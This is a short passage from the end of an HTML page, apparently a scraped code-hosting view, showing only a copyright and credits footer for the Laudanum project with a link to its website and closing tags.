Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Updated by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
Loading…
Reference in a new issue